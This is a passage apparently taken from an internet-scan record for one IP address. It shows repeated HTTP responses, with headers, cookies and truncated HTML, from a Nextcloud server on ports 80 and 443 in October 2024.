max-age=15552000;includeSubdomains Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Page title: Nextcloud <!DOCTYPE html> <html class="ng-csp" data-placeholder-focus="false" lang="en" data-locale="en" > <head data-requesttoken="gNgHvveHK7Pofi0pAYghR4BoAWThEDfFEuthZAOV6GM=:5OhOzM+0GuW4Mx9eRctZKvAlLhWJKVCOJoBTVHbnmhk="> <meta charset="utf-8"> <title> Nextcloud </title> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0"> <meta name="apple-itunes-app" content="app-id=1125420102"> <meta name="theme-color" content="#0082c9"> <link rel="icon" href="/core/img/favicon.ico"> <link rel="apple-touch-icon" href="/core/img/favicon-touch.png"> <link rel="mask-icon" sizes="any" href="/core/img/favicon-mask.svg" color="#0082c9"> <link rel="manifest" href="/core/img/manifest.json"> <link rel="stylesheet" href="/core/css/guest.css?v=c03a1674-3"> <script nonce="Z05nSHZ2ZUhLN1BvZmkwcEFZZ2hSNEJvQVdUaEVEZkZFdXRoWkFPVjZHTT06NU9oT3pNKzBHdVc0TXg5ZVJjdFpLdkFsTGhXSktWQ09Kb0JUVkhibm1oaz0=" defer src="/core/js/dist/main.js?v=c03a1674-3"></script> <script nonce="Z05nSHZ2ZUhLN1BvZmkwcEFZZ2hSNEJvQVdUaEVEZkZFdXRoWkFPVjZHTT06NU9oT3pNKzBHdVc0TXg5ZVJjdFpLdkFsTGhXSktWQ09Kb0JUVkhibm1oaz0=" defer src="/core/js/dist/files_fileinfo.js?v=c03a1674-3"></script> <script nonce="Z05nSHZ2ZUhLN1BvZmkwcEFZZ2hSNEJvQVdUaEVEZkZFdXRoWkFPVjZHTT06NU9oT3pNKzBHdVc0TXg5ZVJjdFpLdkFsTGhXSktWQ09Kb0JUVkhibm1oaz0=" defer src="/core/js/dist/files_client.js?v=c03a1674-3"></script> <script nonce="Z05nSHZ2ZUhLN1BvZmkwcEFZZ2hSNEJvQVdUaEVEZkZFdXRoWkFPVjZHTT06NU9oT3pNKzBHdVc0TXg5ZVJjdFpLdkFsTGhXSktWQ09Kb0JUVkhibm1oaz0=" defer src="/index.php/js/core/merged-template-prepend.js?v=c03a1674-3"></script> <script nonce="Z05nSHZ2ZUhLN1BvZmkwcEFZZ2hSNEJvQVdUaEVEZkZFdXRoWkFPVjZHTT06NU9oT3pNKzBHdVc0TXg5ZVJjdFpLdkFsTGhXSktWQ09Kb0JUVkhibm1oaz0=" defer src="/core/js/backgroundjobs.js?v=c03a1674-3"></script> <script nonce="Z05nSHZ2ZUhLN1BvZmkwcEFZZ2hSNEJvQVdUaEVEZkZFdXRoWkFPVjZHTT06NU9oT3pNKzBHdVc0TXg5ZVJjdFpLdkFsTGhXSktWQ09Kb0JUVkhibm1oaz0="> var _oc_debug=false; var _oc_isadmin=false; var backendAllowsPasswordConfirmation=true; var oc_dataURL=false; var _oc_webroot=""; var _oc_appswebroots={"accessibility":"/apps/accessibility","activity":"/apps/activity","admin_audit":"/apps/admin_audit","bruteforcesettings":"/apps/bruteforcesettings","circles":"/apps/circles","cloud_federation_api":"/apps/cloud_federation_api","comments":"/apps/comments","contactsinteraction":"/apps/contactsinteraction","dashboard":"/apps/dashboard","dav":"/apps/dav","federatedfilesharing":"/apps/federatedfilesharing","federation":"/apps/federation","files":"/apps/files","files_external":"/apps/files_external","files_pdfviewer":"/apps/files_pdfviewer","files_rightclick":"/apps/files_rightclick","files_sharing":"/apps/files_sharing","files_versions":"/apps/files_versions","files_videoplayer":"/apps/files_videoplayer","firstrunwizard":"/apps/firstrunwizard","logreader":"/apps/logreader","lookup_server_connector":"/apps/lookup_server_connector","nextcloud_announcements":"/apps/nextcloud_announcements","notifications":"/apps/notifications","oauth2":"/apps/oauth2","password_policy":"/apps/password_policy","photos":"/apps/photos","privacy":"/apps/privacy","provisioning_api":"/apps/provisioning_api","recommendations":"/apps/recommendations","serverinfo":"/apps/serverinfo","settings":"/apps/settings","sharebymail":"/apps/sharebymail","support":"/apps/support","text":"/apps/text","theming":"/apps/theming","twofactor_backupcodes":"/apps/twofactor_backupcodes","updatenotification":"/apps/updatenotification","user_status":"/apps/user_status","viewer":"/apps/viewer","workflowengine":"/apps/workflowengine"}; var datepickerFormatDate="M\/d\/yy"; var nc_lastLogin=0; var nc_pageLoad=1730418030; var dayNames=["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"]; var dayNamesShort=["Sun.","Mon.","Tue.","Wed.","Thu.","Fri.","Sat."]; var dayNamesMin=["Su","Mo","Tu","We","Th","Fr","Sa"]; var monthNames=["January","February","March","April","May","June","July","August","September","October","November","December"]; var m
Open service 148.81.110.91:443
2024-10-29 23:50
HTTP/1.1 400 Bad Request Date: Tue, 29 Oct 2024 23:50:25 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-SW9WZHg0SjR1V2ozZ1oyY2NaR0ttUlRPd3UrTERxU0I0TTVINVRIRXZiWT06YXZZMm92b3gzaWF2ODg2bE9zRE53SG00dTQ3Q1JORHYwYXB3bGdTRngvQT0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Set-Cookie: oc_sessionPassphrase=bkrKM88lwvXVjuULuEYQV52hpxVVReHm3f78OviuYKmvCeMIijbdCh7LLISrj1GdPthVGF72L2Z6L68huPZ86jDngplEqRbpAzPjQyKI2OyzP0MNBn5vTDBxpJfA%2FVHB; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: oc1vb1y7u9rx=vaahctcpp7qsvbqba7nu53kldg; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2 Connection: Upgrade, close Strict-Transport-Security: max-age=15552000;includeSubdomains Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Page title: Nextcloud <!DOCTYPE html> <html class="ng-csp" data-placeholder-focus="false" lang="en" data-locale="en" > <head data-requesttoken="IoVdx4J4uWj3gZ2ccZGKmRTOwu+LDqSB4M5H5THEvbY=:avY2ovox3iav886lOsDNwHm4u47CRNDv0apwlgSFx/A="> <meta charset="utf-8"> <title> Nextcloud </title> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0"> <meta name="apple-itunes-app" content="app-id=1125420102"> <meta name="theme-color" content="#0082c9"> <link rel="icon" href="/core/img/favicon.ico"> <link rel="apple-touch-icon" href="/core/img/favicon-touch.png"> <link rel="mask-icon" sizes="any" href="/core/img/favicon-mask.svg" color="#0082c9"> <link rel="manifest" href="/core/img/manifest.json"> <link rel="stylesheet" href="/core/css/guest.css?v=c03a1674-3"> <script nonce="SW9WZHg0SjR1V2ozZ1oyY2NaR0ttUlRPd3UrTERxU0I0TTVINVRIRXZiWT06YXZZMm92b3gzaWF2ODg2bE9zRE53SG00dTQ3Q1JORHYwYXB3bGdTRngvQT0=" defer src="/core/js/dist/main.js?v=c03a1674-3"></script> <script nonce="SW9WZHg0SjR1V2ozZ1oyY2NaR0ttUlRPd3UrTERxU0I0TTVINVRIRXZiWT06YXZZMm92b3gzaWF2ODg2bE9zRE53SG00dTQ3Q1JORHYwYXB3bGdTRngvQT0=" defer src="/core/js/dist/files_fileinfo.js?v=c03a1674-3"></script> <script nonce="SW9WZHg0SjR1V2ozZ1oyY2NaR0ttUlRPd3UrTERxU0I0TTVINVRIRXZiWT06YXZZMm92b3gzaWF2ODg2bE9zRE53SG00dTQ3Q1JORHYwYXB3bGdTRngvQT0=" defer src="/core/js/dist/files_client.js?v=c03a1674-3"></script> <script nonce="SW9WZHg0SjR1V2ozZ1oyY2NaR0ttUlRPd3UrTERxU0I0TTVINVRIRXZiWT06YXZZMm92b3gzaWF2ODg2bE9zRE53SG00dTQ3Q1JORHYwYXB3bGdTRngvQT0=" defer src="/index.php/js/core/merged-template-prepend.js?v=c03a1674-3"></script> <script nonce="SW9WZHg0SjR1V2ozZ1oyY2NaR0ttUlRPd3UrTERxU0I0TTVINVRIRXZiWT06YXZZMm92b3gzaWF2ODg2bE9zRE53SG00dTQ3Q1JORHYwYXB3bGdTRngvQT0=" defer src="/core/js/backgroundjobs.js?v=c03a1674-3"></script> <script nonce="SW9WZHg0SjR1V2ozZ1oyY2NaR0ttUlRPd3UrTERxU0I0TTVINVRIRXZiWT06YXZZMm92b3gzaWF2ODg2bE9zRE53SG00dTQ3Q1JORHYwYXB3bGdTRngvQT0="> var _oc_debug=false; var _oc_isadmin=false; var backendAllowsPasswordConfirmation=true; var oc_dataURL=false; var _oc_webroot=""; var _oc_appswebroots={"accessibility":"/apps/accessibility","activity":"/apps/activity","admin_audit":"/apps/admin_audit","bruteforcesettings":"/apps/bruteforcesettings","circles":"/apps/circles","cloud_federation_api":"/apps/cloud_federation_api","comments":"/apps/comments","contactsinteraction":"/apps/contactsinteraction","dashboard":"/apps/dashboard","dav":"/apps/dav","federatedfilesharing":"/apps/federatedfilesharing","federation":"/apps/federation","files":"/apps/files","files_external":"/apps/files_external","files_pdfviewer":"/apps/files_pdfviewer","files_rightclick":"/apps/files_rightclick","files_sharing":"/apps/files_sharing","files_versions":"/apps/files_versions","files_videoplayer":"/apps/files_videoplayer","firstrunwizard":"/apps/firstrunwizard","logreader":"/apps/logreader","lookup_server_connector":"/apps/lookup_server_connector","nextcloud_announcements":"/apps/nextcloud_announcements","notifications":"/apps/notifications","oauth2":"/apps/oauth2","password_policy":"/apps/password_policy","photos":"/apps/photos","privacy":"/apps/privacy","provisioning_api":"/apps/provisioning_api","recommendations":"/apps/recommendations","serverinfo":"/apps/serverinfo","settings":"/apps/settings","sharebymail":"/apps/sharebymail","support":"/apps/support","text":"/apps/text","theming":"/apps/theming","twofactor_backupcodes":"/apps/twofactor_backupcodes","updatenotification":"/apps/updatenotification","user_status":"/apps/user_status","viewer":"/apps/viewer","workflowengine":"/apps/workflowengine"}; var datepickerFormatDate="M\/d\/yy"; var nc_lastLogin=0; var nc_pageLoad=1730245825; var dayNames=["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"]; var dayNamesShort=["Sun.","Mon.","Tue.","Wed.","Thu.","Fri.","Sat."]; var dayNamesMin=["Su","Mo","Tu","We","Th","Fr","Sa"]; var monthNames=["January","February","March","April","May","June","July","August","September","October","November","December"]; var m
Open service 148.81.110.91:80
2024-10-29 06:09
HTTP/1.1 301 Moved Permanently Date: Tue, 29 Oct 2024 06:09:45 GMT Server: Apache Location: https://148.81.110.91/ Content-Length: 230 Connection: close Content-Type: text/html; charset=iso-8859-1 Page title: 301 Moved Permanently <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="https://148.81.110.91/">here</a>.</p> </body></html>
Open service 148.81.110.91:443
2024-10-21 21:52
HTTP/1.1 400 Bad Request Date: Mon, 21 Oct 2024 21:52:09 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-NHhnNi9xZWtyWHVhaU5oejg2ay9FazdWRGNyYk9BRUxZaEg5TXhwU0pxVT06bFd3SXV0Q1cveFhSemF3K3Q4UlRJaW1EZjRHNVRuRlpMa0dmWW5JN2NPND0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Set-Cookie: oc_sessionPassphrase=xviI7WJuz0a3Y4xGHq3OKM9hKcQrPW%2BHzKUZuXUdbNGG%2BF36yP5tC2q8hh%2BMxbh4APcAbN9A%2B0wIcMqb0sS0vTjlUO3AIsetANMI3qiHx2x6p7pg9aYpbIQdUAbjvloT; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: oc1vb1y7u9rx=2cb1jp3q7lratukepceti9fckq; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2 Connection: Upgrade, close Strict-Transport-Security: max-age=15552000;includeSubdomains Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Page title: Nextcloud <!DOCTYPE html> <html class="ng-csp" data-placeholder-focus="false" lang="en" data-locale="en" > <head data-requesttoken="4xg6/qekrXuaiNhz86k/Ek7VDcrbOAELYhH9MxpSJqU=:lWwIutCW/xXRzaw+t8RTIimDf4G5TnFZLkGfYnI7cO4="> <meta charset="utf-8"> <title> Nextcloud </title> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0"> <meta name="apple-itunes-app" content="app-id=1125420102"> <meta name="theme-color" content="#0082c9"> <link rel="icon" href="/core/img/favicon.ico"> <link rel="apple-touch-icon" href="/core/img/favicon-touch.png"> <link rel="mask-icon" sizes="any" href="/core/img/favicon-mask.svg" color="#0082c9"> <link rel="manifest" href="/core/img/manifest.json"> <link rel="stylesheet" href="/core/css/guest.css?v=c03a1674-3"> <script nonce="NHhnNi9xZWtyWHVhaU5oejg2ay9FazdWRGNyYk9BRUxZaEg5TXhwU0pxVT06bFd3SXV0Q1cveFhSemF3K3Q4UlRJaW1EZjRHNVRuRlpMa0dmWW5JN2NPND0=" defer src="/core/js/dist/main.js?v=c03a1674-3"></script> <script nonce="NHhnNi9xZWtyWHVhaU5oejg2ay9FazdWRGNyYk9BRUxZaEg5TXhwU0pxVT06bFd3SXV0Q1cveFhSemF3K3Q4UlRJaW1EZjRHNVRuRlpMa0dmWW5JN2NPND0=" defer src="/core/js/dist/files_fileinfo.js?v=c03a1674-3"></script> <script nonce="NHhnNi9xZWtyWHVhaU5oejg2ay9FazdWRGNyYk9BRUxZaEg5TXhwU0pxVT06bFd3SXV0Q1cveFhSemF3K3Q4UlRJaW1EZjRHNVRuRlpMa0dmWW5JN2NPND0=" defer src="/core/js/dist/files_client.js?v=c03a1674-3"></script> <script nonce="NHhnNi9xZWtyWHVhaU5oejg2ay9FazdWRGNyYk9BRUxZaEg5TXhwU0pxVT06bFd3SXV0Q1cveFhSemF3K3Q4UlRJaW1EZjRHNVRuRlpMa0dmWW5JN2NPND0=" defer src="/index.php/js/core/merged-template-prepend.js?v=c03a1674-3"></script> <script nonce="NHhnNi9xZWtyWHVhaU5oejg2ay9FazdWRGNyYk9BRUxZaEg5TXhwU0pxVT06bFd3SXV0Q1cveFhSemF3K3Q4UlRJaW1EZjRHNVRuRlpMa0dmWW5JN2NPND0=" defer src="/core/js/backgroundjobs.js?v=c03a1674-3"></script> <script nonce="NHhnNi9xZWtyWHVhaU5oejg2ay9FazdWRGNyYk9BRUxZaEg5TXhwU0pxVT06bFd3SXV0Q1cveFhSemF3K3Q4UlRJaW1EZjRHNVRuRlpMa0dmWW5JN2NPND0="> var _oc_debug=false; var _oc_isadmin=false; var backendAllowsPasswordConfirmation=true; var oc_dataURL=false; var _oc_webroot=""; var _oc_appswebroots={"accessibility":"/apps/accessibility","activity":"/apps/activity","admin_audit":"/apps/admin_audit","bruteforcesettings":"/apps/bruteforcesettings","circles":"/apps/circles","cloud_federation_api":"/apps/cloud_federation_api","comments":"/apps/comments","contactsinteraction":"/apps/contactsinteraction","dashboard":"/apps/dashboard","dav":"/apps/dav","federatedfilesharing":"/apps/federatedfilesharing","federation":"/apps/federation","files":"/apps/files","files_external":"/apps/files_external","files_pdfviewer":"/apps/files_pdfviewer","files_rightclick":"/apps/files_rightclick","files_sharing":"/apps/files_sharing","files_versions":"/apps/files_versions","files_videoplayer":"/apps/files_videoplayer","firstrunwizard":"/apps/firstrunwizard","logreader":"/apps/logreader","lookup_server_connector":"/apps/lookup_server_connector","nextcloud_announcements":"/apps/nextcloud_announcements","notifications":"/apps/notifications","oauth2":"/apps/oauth2","password_policy":"/apps/password_policy","photos":"/apps/photos","privacy":"/apps/privacy","provisioning_api":"/apps/provisioning_api","recommendations":"/apps/recommendations","serverinfo":"/apps/serverinfo","settings":"/apps/settings","sharebymail":"/apps/sharebymail","support":"/apps/support","text":"/apps/text","theming":"/apps/theming","twofactor_backupcodes":"/apps/twofactor_backupcodes","updatenotification":"/apps/updatenotification","user_status":"/apps/user_status","viewer":"/apps/viewer","workflowengine":"/apps/workflowengine"}; var datepickerFormatDate="M\/d\/yy"; var nc_lastLogin=0; var nc_pageLoad=1729547529; var dayNames=["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"]; var dayNamesShort=["Sun.","Mon.","Tue.","Wed.","Thu.","Fri.","Sat."]; var dayNamesMin=["Su","Mo","Tu","We","Th","Fr","Sa"]; var monthNames=["January","February","March","April","May","June","July","August","September","October","November","December"]; var m
Open service 148.81.110.91:443
2024-10-19 21:20
HTTP/1.1 400 Bad Request Date: Sat, 19 Oct 2024 21:20:58 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-NlNsY3M3WnJEL0pTYjc0cndnS1Yyb1dNWHA2MWhPUjZkOWo2WUlqZ05DTT06Z1VnK2djOVNRcHMxRFlwaW9HMzRqZXJDT3RUQThLa09SdUNJSytLM2Ntbz0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Set-Cookie: oc_sessionPassphrase=UvLXHPToDSKNi6Ahk8ubFRrhKRVv5TJV04Ug2mODPIpdab%2FZbnd0V6EJDfFoa6jptahWjM6ZWr1deDOoyxWd30fQyBw4qAajnQoikNqZ48H3817%2FC9aLMUjvlKLNWVm6; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: oc1vb1y7u9rx=o4k53u352n9q70d7oc3th7rno6; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2 Connection: Upgrade, close Strict-Transport-Security: max-age=15552000;includeSubdomains Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Page title: Nextcloud <!DOCTYPE html> <html class="ng-csp" data-placeholder-focus="false" lang="en" data-locale="en" > <head data-requesttoken="6Slcs7ZrD/JSb74rwgKV2oWMXp61hOR6d9j6YIjgNCM=:gUg+gc9SQps1DYpioG34jerCOtTA8KkORuCIK+K3cmo="> <meta charset="utf-8"> <title> Nextcloud </title> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0"> <meta name="apple-itunes-app" content="app-id=1125420102"> <meta name="theme-color" content="#0082c9"> <link rel="icon" href="/core/img/favicon.ico"> <link rel="apple-touch-icon" href="/core/img/favicon-touch.png"> <link rel="mask-icon" sizes="any" href="/core/img/favicon-mask.svg" color="#0082c9"> <link rel="manifest" href="/core/img/manifest.json"> <link rel="stylesheet" href="/core/css/guest.css?v=c03a1674-3"> <script nonce="NlNsY3M3WnJEL0pTYjc0cndnS1Yyb1dNWHA2MWhPUjZkOWo2WUlqZ05DTT06Z1VnK2djOVNRcHMxRFlwaW9HMzRqZXJDT3RUQThLa09SdUNJSytLM2Ntbz0=" defer src="/core/js/dist/main.js?v=c03a1674-3"></script> <script nonce="NlNsY3M3WnJEL0pTYjc0cndnS1Yyb1dNWHA2MWhPUjZkOWo2WUlqZ05DTT06Z1VnK2djOVNRcHMxRFlwaW9HMzRqZXJDT3RUQThLa09SdUNJSytLM2Ntbz0=" defer src="/core/js/dist/files_fileinfo.js?v=c03a1674-3"></script> <script nonce="NlNsY3M3WnJEL0pTYjc0cndnS1Yyb1dNWHA2MWhPUjZkOWo2WUlqZ05DTT06Z1VnK2djOVNRcHMxRFlwaW9HMzRqZXJDT3RUQThLa09SdUNJSytLM2Ntbz0=" defer src="/core/js/dist/files_client.js?v=c03a1674-3"></script> <script nonce="NlNsY3M3WnJEL0pTYjc0cndnS1Yyb1dNWHA2MWhPUjZkOWo2WUlqZ05DTT06Z1VnK2djOVNRcHMxRFlwaW9HMzRqZXJDT3RUQThLa09SdUNJSytLM2Ntbz0=" defer src="/index.php/js/core/merged-template-prepend.js?v=c03a1674-3"></script> <script nonce="NlNsY3M3WnJEL0pTYjc0cndnS1Yyb1dNWHA2MWhPUjZkOWo2WUlqZ05DTT06Z1VnK2djOVNRcHMxRFlwaW9HMzRqZXJDT3RUQThLa09SdUNJSytLM2Ntbz0=" defer src="/core/js/backgroundjobs.js?v=c03a1674-3"></script> <script nonce="NlNsY3M3WnJEL0pTYjc0cndnS1Yyb1dNWHA2MWhPUjZkOWo2WUlqZ05DTT06Z1VnK2djOVNRcHMxRFlwaW9HMzRqZXJDT3RUQThLa09SdUNJSytLM2Ntbz0="> var _oc_debug=false; var _oc_isadmin=false; var backendAllowsPasswordConfirmation=true; var oc_dataURL=false; var _oc_webroot=""; var _oc_appswebroots={"accessibility":"/apps/accessibility","activity":"/apps/activity","admin_audit":"/apps/admin_audit","bruteforcesettings":"/apps/bruteforcesettings","circles":"/apps/circles","cloud_federation_api":"/apps/cloud_federation_api","comments":"/apps/comments","contactsinteraction":"/apps/contactsinteraction","dashboard":"/apps/dashboard","dav":"/apps/dav","federatedfilesharing":"/apps/federatedfilesharing","federation":"/apps/federation","files":"/apps/files","files_external":"/apps/files_external","files_pdfviewer":"/apps/files_pdfviewer","files_rightclick":"/apps/files_rightclick","files_sharing":"/apps/files_sharing","files_versions":"/apps/files_versions","files_videoplayer":"/apps/files_videoplayer","firstrunwizard":"/apps/firstrunwizard","logreader":"/apps/logreader","lookup_server_connector":"/apps/lookup_server_connector","nextcloud_announcements":"/apps/nextcloud_announcements","notifications":"/apps/notifications","oauth2":"/apps/oauth2","password_policy":"/apps/password_policy","photos":"/apps/photos","privacy":"/apps/privacy","provisioning_api":"/apps/provisioning_api","recommendations":"/apps/recommendations","serverinfo":"/apps/serverinfo","settings":"/apps/settings","sharebymail":"/apps/sharebymail","support":"/apps/support","text":"/apps/text","theming":"/apps/theming","twofactor_backupcodes":"/apps/twofactor_backupcodes","updatenotification":"/apps/updatenotification","user_status":"/apps/user_status","viewer":"/apps/viewer","workflowengine":"/apps/workflowengine"}; var datepickerFormatDate="M\/d\/yy"; var nc_lastLogin=0; var nc_pageLoad=1729372858; var dayNames=["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"]; var dayNamesShort=["Sun.","Mon.","Tue.","Wed.","Thu.","Fri.","Sat."]; var dayNamesMin=["Su","Mo","Tu","We","Th","Fr","Sa"]; var monthNames=["January","February","March","April","May","June","July","August","September","October","November","December"]; var m
Open service 148.81.110.91:443
2024-10-17 23:21
HTTP/1.1 400 Bad Request Date: Thu, 17 Oct 2024 23:21:47 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-MVJ2a3c1UUFucjlJdmFFM0R0Tlh2dU9QSjR0U3RpNGtSME52QkZzV0xkND06NXl6VzdPUkY3L29ZL3ZFQlo2VVIwZHI4SDZBZitIOVFOQUVCVWlwMGZldz0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Set-Cookie: oc_sessionPassphrase=TksCFT2dH2LrKuQLVM2Q%2BpkrhRoNL7OvaQlmoTBo0jJIK5Qwl6CIJC5UX8%2FD%2BhN0NmuAa9hs7VzldZKwbspUfP37LnBHz%2BqyNbnRTc7UTsl3pwDgvI5XHKCrZYQWsgvg; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: oc1vb1y7u9rx=r8a5ap1881jmm29jsdf8nvbt4v; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2 Connection: Upgrade, close Strict-Transport-Security: max-age=15552000;includeSubdomains Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Page title: Nextcloud <!DOCTYPE html> <html class="ng-csp" data-placeholder-focus="false" lang="en" data-locale="en" > <head data-requesttoken="1Rvkw5QAnr9IvaE3DtNXvuOPJ4tSti4kR0NvBFsWLd4=:5yzW7ORF7/oY/vEBZ6UR0dr8H6Af+H9QNAEBUip0few="> <meta charset="utf-8"> <title> Nextcloud </title> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0"> <meta name="apple-itunes-app" content="app-id=1125420102"> <meta name="theme-color" content="#0082c9"> <link rel="icon" href="/core/img/favicon.ico"> <link rel="apple-touch-icon" href="/core/img/favicon-touch.png"> <link rel="mask-icon" sizes="any" href="/core/img/favicon-mask.svg" color="#0082c9"> <link rel="manifest" href="/core/img/manifest.json"> <link rel="stylesheet" href="/core/css/guest.css?v=c03a1674-3"> <script nonce="MVJ2a3c1UUFucjlJdmFFM0R0Tlh2dU9QSjR0U3RpNGtSME52QkZzV0xkND06NXl6VzdPUkY3L29ZL3ZFQlo2VVIwZHI4SDZBZitIOVFOQUVCVWlwMGZldz0=" defer src="/core/js/dist/main.js?v=c03a1674-3"></script> <script nonce="MVJ2a3c1UUFucjlJdmFFM0R0Tlh2dU9QSjR0U3RpNGtSME52QkZzV0xkND06NXl6VzdPUkY3L29ZL3ZFQlo2VVIwZHI4SDZBZitIOVFOQUVCVWlwMGZldz0=" defer src="/core/js/dist/files_fileinfo.js?v=c03a1674-3"></script> <script nonce="MVJ2a3c1UUFucjlJdmFFM0R0Tlh2dU9QSjR0U3RpNGtSME52QkZzV0xkND06NXl6VzdPUkY3L29ZL3ZFQlo2VVIwZHI4SDZBZitIOVFOQUVCVWlwMGZldz0=" defer src="/core/js/dist/files_client.js?v=c03a1674-3"></script> <script nonce="MVJ2a3c1UUFucjlJdmFFM0R0Tlh2dU9QSjR0U3RpNGtSME52QkZzV0xkND06NXl6VzdPUkY3L29ZL3ZFQlo2VVIwZHI4SDZBZitIOVFOQUVCVWlwMGZldz0=" defer src="/index.php/js/core/merged-template-prepend.js?v=c03a1674-3"></script> <script nonce="MVJ2a3c1UUFucjlJdmFFM0R0Tlh2dU9QSjR0U3RpNGtSME52QkZzV0xkND06NXl6VzdPUkY3L29ZL3ZFQlo2VVIwZHI4SDZBZitIOVFOQUVCVWlwMGZldz0=" defer src="/core/js/backgroundjobs.js?v=c03a1674-3"></script> <script nonce="MVJ2a3c1UUFucjlJdmFFM0R0Tlh2dU9QSjR0U3RpNGtSME52QkZzV0xkND06NXl6VzdPUkY3L29ZL3ZFQlo2VVIwZHI4SDZBZitIOVFOQUVCVWlwMGZldz0="> var _oc_debug=false; var _oc_isadmin=false; var backendAllowsPasswordConfirmation=true; var oc_dataURL=false; var _oc_webroot=""; var _oc_appswebroots={"accessibility":"/apps/accessibility","activity":"/apps/activity","admin_audit":"/apps/admin_audit","bruteforcesettings":"/apps/bruteforcesettings","circles":"/apps/circles","cloud_federation_api":"/apps/cloud_federation_api","comments":"/apps/comments","contactsinteraction":"/apps/contactsinteraction","dashboard":"/apps/dashboard","dav":"/apps/dav","federatedfilesharing":"/apps/federatedfilesharing","federation":"/apps/federation","files":"/apps/files","files_external":"/apps/files_external","files_pdfviewer":"/apps/files_pdfviewer","files_rightclick":"/apps/files_rightclick","files_sharing":"/apps/files_sharing","files_versions":"/apps/files_versions","files_videoplayer":"/apps/files_videoplayer","firstrunwizard":"/apps/firstrunwizard","logreader":"/apps/logreader","lookup_server_connector":"/apps/lookup_server_connector","nextcloud_announcements":"/apps/nextcloud_announcements","notifications":"/apps/notifications","oauth2":"/apps/oauth2","password_policy":"/apps/password_policy","photos":"/apps/photos","privacy":